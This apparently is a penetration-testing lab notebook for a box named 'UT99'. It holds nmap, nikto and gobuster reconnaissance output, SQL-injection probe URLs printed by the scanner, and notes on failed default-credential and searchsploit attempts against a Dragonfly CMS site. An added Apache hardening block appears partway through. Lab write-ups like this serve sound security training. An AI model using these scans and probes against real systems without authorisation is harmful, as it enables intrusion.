UT99

The Nmap scan of the host 192.168.236.44 revealed multiple open ports including FTP, HTTP, and MySQL services, with potential vulnerabilities such as CSRF and Slowloris DOS attack. The HTTP server is running Apache 2.4.16 with PHP 5.6.12, and there are several IRC services active on various ports. Additionally, the scan indicated issues with SSL/TLS configurations and possible SQL injection vulnerabilities on the web application.

Uploaded by Vo Tinh

$ nmap -sV -sC -A -Pn 192.168.236.44
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:01 EST
Nmap scan report for 192.168.236.44
Host is up (0.13s latency).
Not shown: 978 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
443/tcp open ssl/http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
3306/tcp open mysql MySQL (unauthorized)
6666/tcp open irc InspIRCd
6667/tcp open irc InspIRCd
6668/tcp open irc InspIRCd
6669/tcp open irc InspIRCd
6689/tcp open irc InspIRCd
6692/tcp open irc InspIRCd
6699/tcp open irc InspIRCd
6779/tcp open irc InspIRCd
6788/tcp open irc InspIRCd
6789/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 3
| servers: 1
| chans: 1
| lusers: 3
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6792/tcp open irc InspIRCd
6839/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 2
| servers: 1
| chans: 1
| lusers: 2
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6881/tcp open irc InspIRCd
6901/tcp open irc InspIRCd
6969/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 4
| servers: 1
| chans: 1
| lusers: 4
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
7000/tcp open irc InspIRCd
7001/tcp open tcpwrapped
7007/tcp open irc InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds

$ nmap -Pn -p- --script vuln 192.168.236.44


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:06 EST
Nmap scan report for 192.168.236.44
Host is up (0.11s latency).
Not shown: 65190 filtered ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.236.44:80/public_html/
| Form id:
| Form action: /public_html/
|
| Path: http://192.168.236.44:80/public_html/index.php?name=Your_Account&profile=kermit
| Form id:
| Form action: /public_html/index.php?name=Your_Account&profile=kermit
|
| Path: http://192.168.236.44:80/public_html/index.php?name=Your_Account&profile=kermit
| Form id: ulogin2
|_ Form action: index.php?name=Your_Account
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| /phpmyadmin/: phpMyAdmin
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
443/tcp open https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.236.44:443/public_html/
| Form id:
|_ Form action: /public_html/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
3306/tcp open mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
6660/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6661/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6662/tcp open radmind
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6663/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6664/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
6665/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6666/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6667/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6668/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
6669/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6670/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
6671/tcp open p4p-portal
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6672/tcp open vision_server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6673/tcp open vision_elmd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6674/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6675/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6676/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6677/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6678/tcp open vfbp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6679/tcp open osaut
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
… (unknown)
6687/tcp open clever-ctrace
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6688/tcp open clever-tcpip
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6689/tcp open tsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6690/tcp open cleverdetect
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6691/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6692/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6693/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6694/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6695/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6696/tcp open babel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6697/tcp open ircs-u
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
6698/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6699/tcp open napster
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6700/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6701/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6702/tcp open e-design-net
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6703/tcp open e-design-web
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6714/tcp open ibprotocol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6715/tcp open fibotrader-com
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6716/tcp open princity-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6767/tcp open bmc-perf-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6768/tcp open bmc-perf-mgrd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6769/tcp open adi-gxp-srvprt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6770/tcp open plysrv-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6771/tcp open plysrv-https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6777/tcp open ntz-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6778/tcp open ntz-p2p-storage
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6784/tcp open bfd-lag
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6785/tcp open dgpf-exchg
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6786/tcp open smc-jmx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6787/tcp open smc-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6788/tcp open smc-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6789/tcp open ibm-db2-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6790/tcp open hnmp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6791/tcp open hnm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6801/tcp open acnet
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6817/tcp open pentbox-sim
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6841/tcp open netmo-default
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6850/tcp open iccrushmore
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6868/tcp open acctopus-cc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6881/tcp open bittorrent-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6888/tcp open muse
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6900/tcp open rtimeviewer
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6901/tcp open jetstream
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6935/tcp open ethoscan
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6946/tcp open bioserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6951/tcp open otlp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6961/tcp open jmact3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6962/tcp open jmevt2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6963/tcp open swismgr1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6964/tcp open swismgr2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6965/tcp open swistrap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6966/tcp open swispol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6969/tcp open acmsoda
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6970/tcp open conductor
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6997/tcp open MobilitySrv
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6998/tcp open iatp-highpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6999/tcp open iatp-normalpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7000/tcp open afs3-fileserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7005/tcp open afs3-volser
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7007/tcp open afs3-bos
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 985.11 seconds

@ http://192.168.236.44/

@ http://192.168.236.44/public_html/

● MadCowz gaming site


● CPG Dragonfly CMS: Copyright (c) 2003-2020 by CPG-Nuke Development Team,
http://dragonflycms.org
● @ http://192.168.236.44/public_html/robots.txt
User-agent: Baidu
Disallow: /

User-agent: *alexa*
Disallow: /

User-agent: Googlebot-Image
Disallow: /

User-agent: Fasterfox
Disallow: /

User-agent: *
Crawl-delay: 20
Disallow: /admin.php
Disallow: /error.php
Disallow: /admin/
Disallow: /blocks/
Disallow: /cache/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /modules/
Disallow: /themes/

// Nothing here
$ gobuster dir -u 192.168.242.44 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -q -x html,txt,php
/security (Status: 403)
/security.html (Status: 403)
/security.txt (Status: 403)
/security.php (Status: 403)
/Security (Status: 403)
/Security.php (Status: 403)
/Security.html (Status: 403)
/Security.txt (Status: 403)
/licenses (Status: 403)
/licenses.txt (Status: 403)
/licenses.php (Status: 403)
/licenses.html (Status: 403)
^C

$ nikto -h 192.168.236.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.236.44
+ Target Hostname: 192.168.236.44
+ Target Port: 80
+ Start Time: 2020-11-01 08:01:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ OpenSSL/1.0.1p appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.4.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.6.12 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ Retrieved x-powered-by header: PHP/5.6.12
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-
3268: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory
indexing found.
+ OSVDB-
3288: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03
reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8726 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time: 2020-11-01 08:19:44 (GMT-5) (1085 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
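The web findings from the vuln scan and nikto above (TRACE enabled, directory indexing, MultiViews, a 1024-bit DH group, Slowloris exposure, an exposed phpMyAdmin, missing response headers) each map onto an Apache 2.4 directive. The fragment below is an added hardening example written for this write-up; it is not the target's configuration, and the document root, the icons path, the dhparam file and the admin network are assumptions.

```apache
# Added example: Apache 2.4 (Win32) hardening for the nmap --script vuln / nikto
# findings above. Paths and the admin network are assumptions, not from the target.

# --- Settings implied by the scan results (shown commented out) -------------
# TraceEnable on                               # nikto OSVDB-877: TRACE active (XST)
# <Directory "C:/xampp/htdocs">
#     Options Indexes FollowSymLinks MultiViews   # OSVDB-3268 listings + MultiViews guessing
# </Directory>
# SSLCipherSuite DEFAULT                       # TLS_DHE_RSA_WITH_AES_256_CBC_SHA, 1024-bit group

# --- Corrected settings -----------------------------------------------------
TraceEnable off                                # http-trace: TRACE is enabled
ServerTokens Prod                              # stop advertising Apache/OpenSSL/PHP versions
ServerSignature Off

<Directory "C:/xampp/htdocs">                  # assumed document root
    Options -Indexes -MultiViews +FollowSymLinks   # no listings, no mod_negotiation name guessing
    AllowOverride None
    Require all granted
</Directory>

# /icons/ was listed too: the stock alias ships with Indexes turned on
<Directory "C:/xampp/apache/icons">            # assumed icons path
    Options -Indexes
</Directory>

# phpMyAdmin answered the scanner (OSVDB-3092); limit it to an admin network
<Location "/phpmyadmin">
    Require ip 10.0.0.0/24                     # assumed admin range
</Location>

<IfModule headers_module>
    Header always set X-Frame-Options "SAMEORIGIN"     # anti-clickjacking header nikto missed
    Header always set X-Content-Type-Options "nosniff" # MIME sniffing header nikto missed
    Header always unset X-Powered-By                   # PHP/5.6.12 was leaked in x-powered-by
    # X-XSS-Protection was also flagged; modern browsers ignore it, so it is left unset.
</IfModule>

# Slowloris (CVE-2007-6750): cap how long a client may take to deliver a request
<IfModule reqtimeout_module>
    RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500
</IfModule>

# ssl-dh-params reported RFC2409/Oakley Group 2 (1024 bits). Drop SSLv2/SSLv3,
# prefer ECDHE, and serve a 2048-bit DH group generated with
#   openssl dhparam -out dhparam2048.pem 2048
<IfModule ssl_module>
    SSLProtocol all -SSLv2 -SSLv3
    SSLHonorCipherOrder on
    SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384
    # Needs httpd 2.4.8+ built against OpenSSL 1.0.2+ (the target's 1.0.1p is too old, as
    # nikto noted). On httpd 2.4.7+ with older OpenSSL, append the PEM DH parameters to
    # the SSLCertificateFile instead.
    SSLOpenSSLConfCmd DHParameters "C:/xampp/apache/conf/dhparam2048.pem"   # assumed path
</IfModule>
```

After reloading, the nmap http-trace, ssl-dh-params and http-slowloris-check scripts and the nikto header checks above can be re-run to confirm each finding has cleared.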

$ gobuster dir -u http://192.168.236.44/public_html/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 4 -q
/index.php (Status: 200)
/images (Status: 301)
/news.html (Status: 200)
/contact.html (Status: 200)
/search.html (Status: 200)
/rss (Status: 301)
/banners.php (Status: 302)
/themes (Status: 301)
/modules (Status: 301)
/uploads (Status: 301)
/header.php (Status: 200)
/Images (Status: 301)
/News.html (Status: 200)
/admin (Status: 403)
/admin.php (Status: 200)
/privacy_policy.html (Status: 200)
/footer.php (Status: 200)
/gfx.html (Status: 200)
/smilies.html (Status: 200)
/Search.html (Status: 200)
/Contact.html (Status: 200)
/credits.html (Status: 200)
/includes (Status: 301)
/Index.php (Status: 200)
/language (Status: 403)
/statistics.html (Status: 200)
/RSS (Status: 301)
/cache (Status: 403)
/blocks (Status: 403)
/Themes (Status: 301)
/config.php (Status: 403)
/NEWS.html (Status: 200)
/robots.txt (Status: 200)
/surveys.html (Status: 200)
/error.php (Status: 200)
/Banners.php (Status: 302)
/IMAGES (Status: 301)
/%20 (Status: 403)
/Rss (Status: 301)
/Header.php (Status: 200)
/INDEX.php (Status: 200)
/Language (Status: 403)
/Modules (Status: 301)
/Admin (Status: 403)
/Admin.php (Status: 200)
/*checkout* (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/*checkout*.php (Status: 403)
/Statistics.html (Status: 200)
/Privacy_Policy.html (Status: 200)
/coppermine.html (Status: 200)
/Uploads (Status: 301)
/CREDITS.html (Status: 200)
/Surveys.html (Status: 200)
/*docroot* (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/*docroot*.php (Status: 403)
/Config.php (Status: 403)
/Footer.php (Status: 200)
/* (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/*.html (Status: 403)
/con (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/con.php (Status: 403)
/SEARCH.html (Status: 200)
/CONTACT.html (Status: 200)
/Cache (Status: 403)
/Credits.html (Status: 200)
/Your_Account.html (Status: 200)
/Robots.txt (Status: 200)
/Error.php (Status: 200)
/http%3A (Status: 403)
/http%3A.html (Status: 403)
/http%3A.txt (Status: 403)
/http%3A.php (Status: 403)
/Includes (Status: 301)
/Smilies.html (Status: 200)
/**http%3a (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/**http%3a.php (Status: 403)
/*http%3A (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/*http%3A.php (Status: 403)
/aux (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/aux.php (Status: 403)
/your_account.html (Status: 200)
/**http%3A (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/**http%3A.php (Status: 403)
/Private_Messages.html (Status: 401)
/%C0 (Status: 403)
/%C0.html (Status: 403)
/%C0.txt (Status: 403)
/%C0.php (Status: 403)
/sr%3D8-1.html (Status: 200)

@ http://192.168.236.44/public_html/index.php?name=News&file=article&sid=1
We have our first match next Friday night against Cookie Monsters, so beloved daisy has setup a practice server for user to get back into the swing of things.

Join IRC and Mumble to get more information.


● Posted by Fluffy on Saturday, October 03, 2015
○ Users: fluffy, kermit, daisy
@ http://192.168.236.44/public_html/index.php?name=Your_Account

● Tried default creds but failed -> ERROR: “Our records do not indicate an existing user named admin”

// Register a new user but need to confirm via email :(

@ http://192.168.236.44/public_html/admin.php
@ http://192.168.236.44/public_html/uploads/

// Searchsploit dragonfly

- CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution | php/webapps/1478.php [FAILED, don’t understand the exploit]
- Dragonfly Commerce 1.0 - Multiple SQL Injections | asp/webapps/25963.txt [FAILED]

@ http://192.168.236.44/phpmyadmin/

● Try default creds -> don’t work


● Version 4.4.14

● @ http://192.168.236.44/phpmyadmin//Changelog

@ https://192.168.236.44:443/ -> @ https://192.168.236.44/

$ gobuster dir -u 192.168.236.44/phpmyadmin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -x php,html,txt -q
/index.php (Status: 200)
/themes (Status: 301)
/themes.php (Status: 200)
/doc (Status: 301)
/webapp.php (Status: 200)
/Index.php (Status: 200)
/license (Status: 200)
/license.php (Status: 200)
/navigation.php (Status: 200)
/README (Status: 200)
/examples (Status: 301)
/js (Status: 301)
/libraries (Status: 301)
/changelog (Status: 200)
/changelog.php (Status: 200)
/url.php (Status: 302)
/export.php (Status: 200)
/ChangeLog (Status: 200)
/ChangeLog.php (Status: 200)
